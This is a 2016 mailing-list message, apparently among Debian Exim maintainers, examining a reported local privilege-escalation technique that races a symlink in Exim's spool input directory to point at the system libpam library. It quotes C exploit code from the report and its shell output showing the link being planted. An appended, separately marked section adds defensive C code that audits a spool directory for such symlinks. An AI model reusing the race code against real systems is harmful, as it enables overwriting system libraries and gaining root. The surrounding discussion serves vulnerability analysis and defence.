On 2016-09-11 Jeremy Harris <j...@wizmail.org> wrote:
> On 11/09/16 17:16, Andreas Metzler wrote:
> >> And... is that
> >> repeat-by relying on the writability of a library directory
> >> by an unpriv process?
> >
> > /lib/x86_64-linux-gnu/ is 0755 root:root.

> In that case I'm not seeing how this stage works:

> - Symlink /var/spool/exim4/input/xxxxxx-xxxxxx-xx-J to
>   /lib/x86_64-linux-gnu/libpam.so.0.83.1

> Perhaps I'm not understanding "to". What is the "ls -l" output for
> the symlink just created?

  strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
  dirStruct=opendir("/var/spool/exim4/msglog");
  assert(dirStruct);
  result=1;
  while(result) {
    while((dirEnt=readdir(dirStruct))) {
      if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
      system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
      strncpy(linkPath+23, dirEnt->d_name, 16);
      system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
      result=symlink(TARGET_PATH, linkPath);
      system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
      assert(!result);
      fprintf(stderr, "Relinked %s\n", linkPath);
      break;
...

$ /tmp/EximUpgrade --Upgrade
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1

/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1

/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1

/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
lrwxrwxrwx 1 Debian-exim Debian-exim  38 Sep 11 17:20 1bj8R0-0004c9-JG-J -> /lib/x86_64-linux-gnu/libpam.so.0.83.1
Relinked /var/spool/exim4/input/1bj8R0-0004c9-JG-J
Target ready for writing
EximUpgrade: EximUpgrade-debugme.c:163: main: Assertion `result==newStatData.st_size' failed.
Aborted

cu Andreas
-- 
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'
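For the defender's side of the listing above, an added example (not part of the original message, and not Exim code): a C check that walks a spool input directory with lstat() and flags symlinks such as the -J entry shown, plus anything that is not a regular file owned by the spool user. The function names, the report format and the constructed fixture directory are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* Count entries in spool_dir that are symlinks, non-regular files, or not owned
 * by spool_uid. lstat() never follows the link. Returns -1 if opendir() fails. */
int audit_spool(const char *spool_dir, uid_t spool_uid, FILE *report)
{
    DIR *d = opendir(spool_dir);
    struct dirent *e; int flagged = 0;
    if (!d) return -1;
    while ((e = readdir(d))) {
        char path[PATH_MAX], target[PATH_MAX];
        struct stat st;
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        snprintf(path, sizeof path, "%s/%s", spool_dir, e->d_name);
        if (lstat(path, &st) != 0) continue;   /* entry vanished: spool is live */
        if (S_ISLNK(st.st_mode)) {
            ssize_t n = readlink(path, target, sizeof target - 1);
            target[n > 0 ? n : 0] = '\0';
            fprintf(report, "SYMLINK %s -> %s\n", path, target);
            flagged++;
        } else if (!S_ISREG(st.st_mode) || st.st_uid != spool_uid) {
            fprintf(report, "UNEXPECTED %s uid=%ld\n", path, (long)st.st_uid);
            flagged++;
        }
    }
    closedir(d);
    return flagged;
}

/* Constructed fixture mirroring the listing: -D and -H files plus a -J symlink. */
int demo_constructed_spool(void)
{
    char dir[] = "/tmp/spoolauditXXXXXX", p[PATH_MAX];
    if (!mkdtemp(dir)) return -1;
    for (int i = 0; i < 2; i++) {
        snprintf(p, sizeof p, "%s/1bj8R0-0004c9-JG-%c", dir, "DH"[i]);
        FILE *f = fopen(p, "w");
        if (!f) return -1;
        fclose(f);
    }
    snprintf(p, sizeof p, "%s/1bj8R0-0004c9-JG-J", dir);
    if (symlink("/lib/x86_64-linux-gnu/libpam.so.0.83.1", p) != 0) return -1;
    return audit_spool(dir, geteuid(), stderr);   /* only the -J link is flagged */
}
```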